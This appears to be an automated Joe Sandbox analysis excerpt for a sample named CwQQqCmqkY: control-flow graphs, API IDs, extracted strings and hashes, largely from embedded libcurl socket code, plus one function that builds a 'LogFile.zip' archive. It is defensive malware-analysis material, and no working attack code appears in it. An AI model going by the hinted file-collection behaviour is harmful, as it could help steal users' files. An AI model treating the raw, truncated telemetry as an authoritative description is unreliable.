                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Alt-Used$Alt-Used: %s:%d$Content-Range$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$GET$HEAD$HTTP request too large$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$User-Agent
                    • API String ID: 0-931929960
                    • Opcode ID: 64ce2e67417166897317ad888b9eced8e7f2cdd374a3f25915fd3c4fb2c577b3
                    • Instruction ID: bb5fef6942923ea71f450cb79aa41b897e6a072d7f1cf1ffb60057d69748b959
                    • Opcode Fuzzy Hash: 64ce2e67417166897317ad888b9eced8e7f2cdd374a3f25915fd3c4fb2c577b3
                    • Instruction Fuzzy Hash: D5529221B0878685FB19EBA994503F9A7A4EF49788FC80035DE6D876D5DFBCE444C3A0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2441 7ff7f12b80a0-7ff7f12b8103 call 7ff7f12baae0 call 7ff7f12b88e0 2446 7ff7f12b8105-7ff7f12b8125 call 7ff7f12b21f0 2441->2446 2447 7ff7f12b8173-7ff7f12b817a 2441->2447 2455 7ff7f12b81db-7ff7f12b81e2 2446->2455 2456 7ff7f12b812b-7ff7f12b816e call 7ff7f130b5f0 * 3 call 7ff7f12c5ab0 call 7ff7f12af6f0 2446->2456 2448 7ff7f12b8195-7ff7f12b81da call 7ff7f12af830 call 7ff7f12fa740 2447->2448 2449 7ff7f12b817c-7ff7f12b818e call 7ff7f12b87c0 2447->2449 2449->2448 2459 7ff7f12b8212 2455->2459 2460 7ff7f12b81e4-7ff7f12b8210 setsockopt 2455->2460 2456->2447 2464 7ff7f12b8219-7ff7f12b8236 call 7ff7f12af7e0 2459->2464 2460->2464 2470 7ff7f12b8238-7ff7f12b823b 2464->2470 2471 7ff7f12b823d-7ff7f12b8242 2464->2471 2470->2471 2473 7ff7f12b82a8 2470->2473 2471->2473 2474 7ff7f12b8244-7ff7f12b824d 2471->2474 2475 7ff7f12b82ab-7ff7f12b82ce 2473->2475 2474->2475 2477 7ff7f12b824f-7ff7f12b827a setsockopt 2474->2477 2478 7ff7f12b82d0-7ff7f12b82ef call 7ff7f12ed430 2475->2478 2479 7ff7f12b8309-7ff7f12b830c 2475->2479 2477->2475 2481 7ff7f12b827c-7ff7f12b82a6 WSAGetLastError call 7ff7f12c5ab0 call 7ff7f12af7e0 2477->2481 2496 7ff7f12b82f1-7ff7f12b82fb 2478->2496 2497 7ff7f12b82fd-7ff7f12b8307 2478->2497 2484 7ff7f12b8360-7ff7f12b8363 2479->2484 2485 7ff7f12b830e-7ff7f12b8333 getsockopt 2479->2485 2481->2475 2491 7ff7f12b84a5-7ff7f12b84ad 2484->2491 2492 7ff7f12b8369-7ff7f12b8370 2484->2492 2489 7ff7f12b833f-7ff7f12b835a setsockopt 2485->2489 2490 7ff7f12b8335-7ff7f12b833d 2485->2490 2489->2484 2490->2484 2490->2489 2494 7ff7f12b84f0 2491->2494 2495 7ff7f12b84af-7ff7f12b84db call 7ff7f129aee0 * 2 2491->2495 2492->2491 2498 7ff7f12b8376-7ff7f12b83a4 setsockopt 2492->2498 2502 7ff7f12b84f3-7ff7f12b84fa 2494->2502 2532 7ff7f12b84e2-7ff7f12b84e4 2495->2532 2533 7ff7f12b84dd-7ff7f12b84e0 2495->2533 2496->2484 2497->2485 2503 7ff7f12b83a6-7ff7f12b83b3 WSAGetLastError 2498->2503 2504 7ff7f12b83b8-7ff7f12b83ea call 7ff7f12b39b0 setsockopt 2498->2504 2508 7ff7f12b8501-7ff7f12b8525 call 7ff7f12ed950 call 7ff7f12b7ac0 2502->2508 2509 7ff7f12b84fc-7ff7f12b84ff 2502->2509 2505 7ff7f12b8497-7ff7f12b84a0 call 7ff7f12af7e0 2503->2505 2515 7ff7f12b8407-7ff7f12b8439 call 7ff7f12b39b0 setsockopt 2504->2515 2516 7ff7f12b83ec-7ff7f12b8402 WSAGetLastError call 7ff7f12af7e0 2504->2516 2505->2491 2511 7ff7f12b853a-7ff7f12b8542 call 7ff7f12ed920 2508->2511 2529 7ff7f12b8527-7ff7f12b852a 2508->2529 2509->2508 2509->2511 2523 7ff7f12b8547-7ff7f12b8549 2511->2523 2530 7ff7f12b8456-7ff7f12b8488 call 7ff7f12b39b0 setsockopt 2515->2530 2531 7ff7f12b843b-7ff7f12b8451 WSAGetLastError call 7ff7f12af7e0 2515->2531 2516->2515 2527 7ff7f12b8562-7ff7f12b8573 2523->2527 2528 7ff7f12b854b-7ff7f12b855d WSAGetLastError 2523->2528 2527->2447 2534 7ff7f12b8579-7ff7f12b857c 2527->2534 2528->2447 2529->2447 2535 7ff7f12b8530-7ff7f12b8535 2529->2535 2530->2491 2542 7ff7f12b848a-7ff7f12b8490 WSAGetLastError 2530->2542 2531->2530 2532->2494 2537 7ff7f12b84e6-7ff7f12b84eb 2532->2537 2533->2502 2534->2448 2539 7ff7f12b8582-7ff7f12b85a7 call 7ff7f12b8640 call 7ff7f12baae0 2534->2539 2535->2447 2537->2447 2539->2448 2542->2505
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$CountCounterPerformanceQueryTickgetsocknamegetsockopthtons
                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                    • API String ID: 3449839174-1591695899
                    • Opcode ID: 21224ee5e1d8ce4273d4f391f1f8909067e9d34e81e55b6579ffe6d8ed8d71ff
                    • Instruction ID: cafe6a7dd42340e17552111c2ba556bf120fa39931ebd317f74c0f39b31bea90
                    • Opcode Fuzzy Hash: 21224ee5e1d8ce4273d4f391f1f8909067e9d34e81e55b6579ffe6d8ed8d71ff
                    • Instruction Fuzzy Hash: 89D1D431B0868286F710EF6AD4447BAA360FF48B94F800139DA6D876D5DFBCE445D7A0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2719 7ff7f12b2dd0-7ff7f12b2e28 2720 7ff7f12b2e30-7ff7f12b2e57 call 7ff7f12baae0 2719->2720 2723 7ff7f12b2e60-7ff7f12b2e66 2720->2723 2724 7ff7f12b30b1-7ff7f12b30c8 2723->2724 2725 7ff7f12b2e6c-7ff7f12b2e70 2723->2725 2724->2723 2727 7ff7f12b30ce 2724->2727 2725->2724 2726 7ff7f12b2e76-7ff7f12b2e7a 2725->2726 2728 7ff7f12b2e86-7ff7f12b2e91 2726->2728 2729 7ff7f12b2e7c-7ff7f12b2e81 2726->2729 2730 7ff7f12b30d2-7ff7f12b30d5 2727->2730 2733 7ff7f12b2e93-7ff7f12b2e95 2728->2733 2734 7ff7f12b2f0b-7ff7f12b2f36 call 7ff7f12af830 2728->2734 2729->2724 2731 7ff7f12b3552 2730->2731 2732 7ff7f12b30db-7ff7f12b30e2 2730->2732 2735 7ff7f12b3556 2731->2735 2736 7ff7f12b30e4-7ff7f12b30e7 2732->2736 2737 7ff7f12b30ed-7ff7f12b30f7 2732->2737 2733->2734 2739 7ff7f12b2e97-7ff7f12b2ea4 call 7ff7f12ae3d0 2733->2739 2749 7ff7f12b2f58-7ff7f12b2f5c 2734->2749 2750 7ff7f12b2f38-7ff7f12b2f3b 2734->2750 2740 7ff7f12b3558-7ff7f12b357a 2735->2740 2736->2737 2741 7ff7f12b3411-7ff7f12b3423 call 7ff7f12af830 2736->2741 2742 7ff7f12b30f9-7ff7f12b3126 call 7ff7f12bab70 2737->2742 2743 7ff7f12b312a-7ff7f12b3168 call 7ff7f12bab70 2737->2743 2751 7ff7f12b2ea9-7ff7f12b2eae 2739->2751 2761 7ff7f12b3427-7ff7f12b342d 2741->2761 2742->2743 2762 7ff7f12b3174-7ff7f12b3177 2743->2762 2763 7ff7f12b316a-7ff7f12b3171 2743->2763 2759 7ff7f12b2f62-7ff7f12b2f67 2749->2759 2760 7ff7f12b30ae 2749->2760 2755 7ff7f12b3291-7ff7f12b32a8 2750->2755 2756 7ff7f12b2f41-7ff7f12b2f48 2750->2756 2757 7ff7f12b2eb4-7ff7f12b2eb7 2751->2757 2758 7ff7f12b2f4d-7ff7f12b2f50 2751->2758 2755->2730 2756->2760 2765 7ff7f12b2ec1-7ff7f12b2ee2 call 7ff7f12bab70 2757->2765 2766 7ff7f12b2eb9-7ff7f12b2ebf 2757->2766 2758->2734 2764 7ff7f12b2f52-7ff7f12b2f56 2758->2764 2767 7ff7f12b2f69-7ff7f12b2f72 WSASetLastError 2759->2767 2768 7ff7f12b2f78-7ff7f12b2f82 2759->2768 2760->2724 2772 7ff7f12b342f-7ff7f12b3457 call 7ff7f12af830 2761->2772 2773 7ff7f12b3460-7ff7f12b346b 2761->2773 2774 7ff7f12b317d-7ff7f12b3180 2762->2774 2775 7ff7f12b351c-7ff7f12b3550 call 7ff7f12bab70 call 7ff7f12af6f0 2762->2775 2763->2762 2764->2734 2785 7ff7f12b2ee4-7ff7f12b2f00 call 7ff7f12af7e0 2765->2785 2786 7ff7f12b2f07 2765->2786 2766->2734 2767->2768 2770 7ff7f12b2fb5-7ff7f12b2ff5 call 7ff7f12bab70 2768->2770 2771 7ff7f12b2f84-7ff7f12b2fb1 call 7ff7f12bab70 2768->2771 2797 7ff7f12b3001-7ff7f12b3005 2770->2797 2798 7ff7f12b2ff7-7ff7f12b2ffe 2770->2798 2771->2770 2772->2773 2799 7ff7f12b3459-7ff7f12b345e 2772->2799 2773->2761 2780 7ff7f12b346d 2773->2780 2782 7ff7f12b3400-7ff7f12b3403 2774->2782 2783 7ff7f12b3186-7ff7f12b3193 2774->2783 2775->2740 2790 7ff7f12b3473-7ff7f12b347f 2780->2790 2782->2741 2784 7ff7f12b3405-7ff7f12b340c 2782->2784 2792 7ff7f12b3199-7ff7f12b319d 2783->2792 2793 7ff7f12b32cb-7ff7f12b32d6 2783->2793 2784->2735 2785->2786 2786->2734 2800 7ff7f12b3481-7ff7f12b3488 2790->2800 2801 7ff7f12b348f-7ff7f12b3497 2790->2801 2792->2793 2803 7ff7f12b31a3-7ff7f12b31aa 2792->2803 2795 7ff7f12b33eb-7ff7f12b33f6 2793->2795 2796 7ff7f12b32dc-7ff7f12b32e0 2793->2796 2795->2720 2810 7ff7f12b33fc 2795->2810 2796->2795 2805 7ff7f12b32e6-7ff7f12b32ed 2796->2805 2806 7ff7f12b3054-7ff7f12b3062 2797->2806 2807 7ff7f12b3007-7ff7f12b300e 2797->2807 2798->2797 2799->2773 2808 7ff7f12b348a-7ff7f12b348d 2799->2808 2809 7ff7f12b34b9-7ff7f12b351a call 7ff7f12c5c90 call 7ff7f12bab70 call 7ff7f12af6f0 2800->2809 2812 7ff7f12b34a2-7ff7f12b34aa 2801->2812 2813 7ff7f12b3499-7ff7f12b34a0 2801->2813 2814 7ff7f12b31b2-7ff7f12b31d4 call 7ff7f12bab70 2803->2814 2815 7ff7f12b31ac-7ff7f12b31b0 2803->2815 2822 7ff7f12b32ef-7ff7f12b32f3 2805->2822 2823 7ff7f12b32f5-7ff7f12b3313 call 7ff7f12bab70 2805->2823 2820 7ff7f12b3066-7ff7f12b3073 2806->2820 2824 7ff7f12b3010-7ff7f12b3017 2807->2824 2825 7ff7f12b3027-7ff7f12b302f 2807->2825 2808->2790 2809->2740 2810->2782 2817 7ff7f12b34b5 2812->2817 2818 7ff7f12b34ac-7ff7f12b34b3 2812->2818 2813->2809 2814->2793 2816 7ff7f12b31da-7ff7f12b31e4 2814->2816 2815->2814 2815->2816 2827 7ff7f12b31e6-7ff7f12b3213 call 7ff7f12bab70 2816->2827 2828 7ff7f12b3217-7ff7f12b3257 call 7ff7f12bab70 2816->2828 2817->2809 2818->2809 2829 7ff7f12b3075-7ff7f12b3081 call 7ff7f12af830 2820->2829 2830 7ff7f12b3083-7ff7f12b30a1 call 7ff7f12af830 call 7ff7f129a080 2820->2830 2822->2823 2832 7ff7f12b3319-7ff7f12b3323 2822->2832 2823->2795 2823->2832 2824->2825 2834 7ff7f12b3019-7ff7f12b301f 2824->2834 2835 7ff7f12b3041-7ff7f12b3052 call 7ff7f12b2930 2825->2835 2836 7ff7f12b3031-7ff7f12b303d 2825->2836 2827->2828 2858 7ff7f12b3263-7ff7f12b3281 call 7ff7f12b2930 2828->2858 2859 7ff7f12b3259-7ff7f12b3260 2828->2859 2856 7ff7f12b30a6-7ff7f12b30aa 2829->2856 2830->2856 2845 7ff7f12b3325-7ff7f12b3352 call 7ff7f12bab70 2832->2845 2846 7ff7f12b3356-7ff7f12b3396 call 7ff7f12bab70 2832->2846 2834->2824 2844 7ff7f12b3021-7ff7f12b3025 2834->2844 2835->2820 2836->2835 2844->2835 2845->2846 2862 7ff7f12b33a2-7ff7f12b33c0 call 7ff7f12b2930 2846->2862 2863 7ff7f12b3398-7ff7f12b339f 2846->2863 2856->2760 2869 7ff7f12b3283-7ff7f12b328f call 7ff7f12af830 2858->2869 2870 7ff7f12b32ad-7ff7f12b32c5 call 7ff7f12af830 2858->2870 2859->2858 2872 7ff7f12b33c2-7ff7f12b33ce call 7ff7f12af830 2862->2872 2873 7ff7f12b33d0-7ff7f12b33e8 call 7ff7f12af830 2862->2873 2863->2862 2869->2793 2870->2793 2872->2795 2873->2795
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuery
                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                    • API String ID: 2783962273-3359130258
                    • Opcode ID: ea7675378e61296b6a7ad0aef74f3159fa35e7ee6510e834bf48cfb15cbe0526
                    • Instruction ID: bed26a3c96d0e1e568d49690769cc43771cac7f380e7371aafae466419d66dc5
                    • Opcode Fuzzy Hash: ea7675378e61296b6a7ad0aef74f3159fa35e7ee6510e834bf48cfb15cbe0526
                    • Instruction Fuzzy Hash: FA32C222B0868586FB15EFA9C4402BCB3B1FB08B98F844235DE6D977D5DF78A552C390

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CompatibleCreateObject$BitmapDeleteSelect
                    • String ID:
                    • API String ID: 2649417129-3916222277
                    • Opcode ID: 22714aae1b63b9293d8a0d4ee888f82aa773feed96b0aa01a97f1c734155d147
                    • Instruction ID: 845b6400675400ea7cdd6df1c4dc9bbd465bcd3e29f475386860972f9af0d2be
                    • Opcode Fuzzy Hash: 22714aae1b63b9293d8a0d4ee888f82aa773feed96b0aa01a97f1c734155d147
                    • Instruction Fuzzy Hash: 5621A636A08B8187D714EF21E41436AF760FB98B94F544139EA9E43B94DF7CD045CB80

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3368 7ff7f12c4840-7ff7f12c4878 3369 7ff7f12c4894-7ff7f12c4897 3368->3369 3370 7ff7f12c487a-7ff7f12c487f 3368->3370 3372 7ff7f12c4bf5 3369->3372 3373 7ff7f12c489d 3369->3373 3370->3369 3371 7ff7f12c4881 3370->3371 3376 7ff7f12c4884-7ff7f12c4888 3371->3376 3374 7ff7f12c48a3-7ff7f12c48b8 WSASetLastError 3373->3374 3375 7ff7f12c4bde-7ff7f12c4bef Sleep 3373->3375 3377 7ff7f12c4a61-7ff7f12c4a80 call 7ff7f12fa740 3374->3377 3375->3372 3378 7ff7f12c488a-7ff7f12c4892 3376->3378 3379 7ff7f12c48bd-7ff7f12c48fb 3376->3379 3378->3369 3378->3376 3380 7ff7f12c4900-7ff7f12c4913 3379->3380 3382 7ff7f12c4919 3380->3382 3383 7ff7f12c4a1e-7ff7f12c4a22 3380->3383 3385 7ff7f12c491f-7ff7f12c492e 3382->3385 3386 7ff7f12c4a44-7ff7f12c4a49 WSASetLastError 3382->3386 3383->3380 3387 7ff7f12c4a28-7ff7f12c4a2b 3383->3387 3385->3383 3390 7ff7f12c4934-7ff7f12c493f 3385->3390 3391 7ff7f12c4a4f-7ff7f12c4a59 3386->3391 3388 7ff7f12c4a2d-7ff7f12c4a30 3387->3388 3389 7ff7f12c4aac-7ff7f12c4afa call 7ff7f12f14d0 select 3387->3389 3388->3389 3392 7ff7f12c4a32-7ff7f12c4a35 3388->3392 3410 7ff7f12c4afc-7ff7f12c4afe 3389->3410 3393 7ff7f12c4941-7ff7f12c4947 3390->3393 3394 7ff7f12c497f-7ff7f12c4983 3390->3394 3391->3377 3392->3389 3396 7ff7f12c4a37-7ff7f12c4a3a 3392->3396 3397 7ff7f12c4960-7ff7f12c4963 3393->3397 3398 7ff7f12c4949 3393->3398 3399 7ff7f12c4985-7ff7f12c498b 3394->3399 3400 7ff7f12c49c9-7ff7f12c49d2 3394->3400 3402 7ff7f12c4a81 3396->3402 3403 7ff7f12c4a3c-7ff7f12c4a3f 3396->3403 3397->3394 3407 7ff7f12c4965-7ff7f12c4969 3397->3407 3406 7ff7f12c4950-7ff7f12c4957 3398->3406 3408 7ff7f12c49a3-7ff7f12c49a6 3399->3408 3409 7ff7f12c498d 3399->3409 3404 7ff7f12c49d4-7ff7f12c49da 3400->3404 3405 7ff7f12c4a19 3400->3405 3418 7ff7f12c4a90-7ff7f12c4aaa Sleep 3402->3418 3419 7ff7f12c4a83-7ff7f12c4a8e WSASetLastError 3402->3419 3403->3410 3415 7ff7f12c49f3-7ff7f12c49f6 3404->3415 3416 7ff7f12c49dc 3404->3416 3405->3383 3406->3397 3417 7ff7f12c4959-7ff7f12c495e 3406->3417 3407->3394 3420 7ff7f12c496b-7ff7f12c497a 3407->3420 3408->3400 3414 7ff7f12c49a8-7ff7f12c49ac 3408->3414 3411 7ff7f12c4990-7ff7f12c499a 3409->3411 3412 7ff7f12c4b00-7ff7f12c4b03 3410->3412 3413 7ff7f12c4b1d-7ff7f12c4b36 3410->3413 3411->3408 3421 7ff7f12c499c-7ff7f12c49a1 3411->3421 3412->3391 3422 7ff7f12c4b09-7ff7f12c4b18 WSAGetLastError 3412->3422 3423 7ff7f12c4b40-7ff7f12c4b4c 3413->3423 3414->3400 3424 7ff7f12c49ae-7ff7f12c49c2 3414->3424 3415->3405 3426 7ff7f12c49f8-7ff7f12c49fc 3415->3426 3425 7ff7f12c49e0-7ff7f12c49ea 3416->3425 3417->3397 3417->3406 3418->3410 3419->3410 3420->3394 3421->3408 3421->3411 3422->3391 3427 7ff7f12c4bc9-7ff7f12c4bd1 3423->3427 3428 7ff7f12c4b4e-7ff7f12c4b5a call 7ff7f132bff6 3423->3428 3424->3400 3425->3415 3429 7ff7f12c49ec-7ff7f12c49f1 3425->3429 3426->3405 3430 7ff7f12c49fe-7ff7f12c4a12 3426->3430 3427->3423 3432 7ff7f12c4bd7 3427->3432 3434 7ff7f12c4b77-7ff7f12c4b89 __WSAFDIsSet 3428->3434 3435 7ff7f12c4b5c-7ff7f12c4b64 3428->3435 3429->3415 3429->3425 3430->3405 3432->3375 3438 7ff7f12c4b95-7ff7f12c4ba7 __WSAFDIsSet 3434->3438 3439 7ff7f12c4b8b-7ff7f12c4b8f 3434->3439 3436 7ff7f12c4b66 3435->3436 3437 7ff7f12c4b6a-7ff7f12c4b72 3435->3437 3436->3437 3437->3434 3440 7ff7f12c4b74 3437->3440 3442 7ff7f12c4bc1-7ff7f12c4bc5 3438->3442 3443 7ff7f12c4ba9-7ff7f12c4bb1 3438->3443 3439->3438 3441 7ff7f12c4b91 3439->3441 3440->3434 3441->3438 3442->3427 3446 7ff7f12c4bc7 3442->3446 3444 7ff7f12c4bb3 3443->3444 3445 7ff7f12c4bb7-7ff7f12c4bbb 3443->3445 3444->3445 3445->3442 3447 7ff7f12c4bbd 3445->3447 3446->3427 3447->3442
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$Sleep$select
                    • String ID:
                    • API String ID: 2442476585-0
                    • Opcode ID: f0398666957f93719acc28cadf4acf8fd07e7547978437943352cb69dc42711a
                    • Instruction ID: c2db30a93023b241d68fd92880faa1431504c20b7fea099b1092f0d2b8d31b17
                    • Opcode Fuzzy Hash: f0398666957f93719acc28cadf4acf8fd07e7547978437943352cb69dc42711a
                    • Instruction Fuzzy Hash: 31A10821B08AC286EB696F58D8143BAA294FF647B8F904234DB3D977C4DF7DA940C354

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3512 7ff7f12b6560-7ff7f12b6598 3513 7ff7f12b67e6 3512->3513 3514 7ff7f12b659e-7ff7f12b65a1 3512->3514 3517 7ff7f12b67ea 3513->3517 3515 7ff7f12b65a3-7ff7f12b65a8 3514->3515 3516 7ff7f12b65ad-7ff7f12b65b9 3514->3516 3518 7ff7f12b67ec-7ff7f12b680b call 7ff7f12fa740 3515->3518 3519 7ff7f12b6722-7ff7f12b673f call 7ff7f12c4dc0 3516->3519 3520 7ff7f12b65bf-7ff7f12b65c8 call 7ff7f12b80a0 3516->3520 3517->3518 3527 7ff7f12b6741-7ff7f12b6753 call 7ff7f12af830 3519->3527 3528 7ff7f12b6758-7ff7f12b675b 3519->3528 3529 7ff7f12b6673-7ff7f12b667a 3520->3529 3530 7ff7f12b65ce-7ff7f12b65d1 3520->3530 3527->3517 3534 7ff7f12b6790-7ff7f12b67a5 call 7ff7f12b8980 3528->3534 3535 7ff7f12b675d-7ff7f12b6768 3528->3535 3532 7ff7f12b66ed-7ff7f12b66f8 3529->3532 3533 7ff7f12b667c-7ff7f12b66e8 call 7ff7f12b8640 WSASetLastError call 7ff7f12c5ab0 call 7ff7f12af7e0 3529->3533 3530->3513 3536 7ff7f12b65d7-7ff7f12b65f4 3530->3536 3539 7ff7f12b66fa-7ff7f12b670c call 7ff7f12b87c0 3532->3539 3540 7ff7f12b6717 3532->3540 3533->3532 3546 7ff7f12b666b-7ff7f12b666d 3534->3546 3555 7ff7f12b67ab-7ff7f12b67c5 call 7ff7f12baae0 call 7ff7f12b8640 3534->3555 3535->3534 3544 7ff7f12b676a-7ff7f12b676d 3535->3544 3537 7ff7f12b65f6-7ff7f12b660b connect 3536->3537 3538 7ff7f12b660e-7ff7f12b661d WSAGetLastError call 7ff7f12b8640 3536->3538 3537->3538 3553 7ff7f12b6622-7ff7f12b6651 call 7ff7f12af830 3538->3553 3539->3540 3550 7ff7f12b671b-7ff7f12b671d 3540->3550 3545 7ff7f12b6773-7ff7f12b678b call 7ff7f12b8980 3544->3545 3544->3546 3545->3529 3546->3529 3546->3550 3550->3518 3553->3519 3564 7ff7f12b6657-7ff7f12b6669 call 7ff7f12b8850 3553->3564 3567 7ff7f12b67ca-7ff7f12b67e4 call 7ff7f12af830 3555->3567 3564->3546 3567->3517
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$connect
                    • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                    • API String ID: 375857812-3816509080
                    • Opcode ID: ef366d6777c4c2a75419f39645e902c094e0490a4b7c3cd8d531bf5384c74c5e
                    • Instruction ID: 9dd87dceb6ffced6900cbf3fed2d50628a006b44f77bec72d20a2e8f0968c7a6
                    • Opcode Fuzzy Hash: ef366d6777c4c2a75419f39645e902c094e0490a4b7c3cd8d531bf5384c74c5e
                    • Instruction Fuzzy Hash: A561C321B0868285FB54EBA9D4003F9A751FB49BA4F844231DE7D8B7D5DFACE445C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Directory$Current$Create_invalid_parameter_noinfo_noreturn$DeleteFileInformationVolumeWindowswsprintf
                    • String ID: LogFile.zip$\LogFile.zip
                    • API String ID: 2048956897-64219389
                    • Opcode ID: 4422c6c57ba5b6aa448b7d2a9ccdcfc47659359c487a1c949cfbbd17470857b0
                    • Instruction ID: 8c86745a820af5901353fcd34505cbf9a113a5029bd0cb313ff852d5a21d650a
                    • Opcode Fuzzy Hash: 4422c6c57ba5b6aa448b7d2a9ccdcfc47659359c487a1c949cfbbd17470857b0
                    • Instruction Fuzzy Hash: 40512463F18AC692EB00EB64D4501BDA370FFD5344F901236E6AD929E9DFACE544C790
                    APIs
                    • FreeLibrary.KERNEL32(?,?,?,00007FF7F131C878,?,?,?,?,00007FF7F1318D31,?,?,?,?,00007FF7F12FB248), ref: 00007FF7F131BFA8
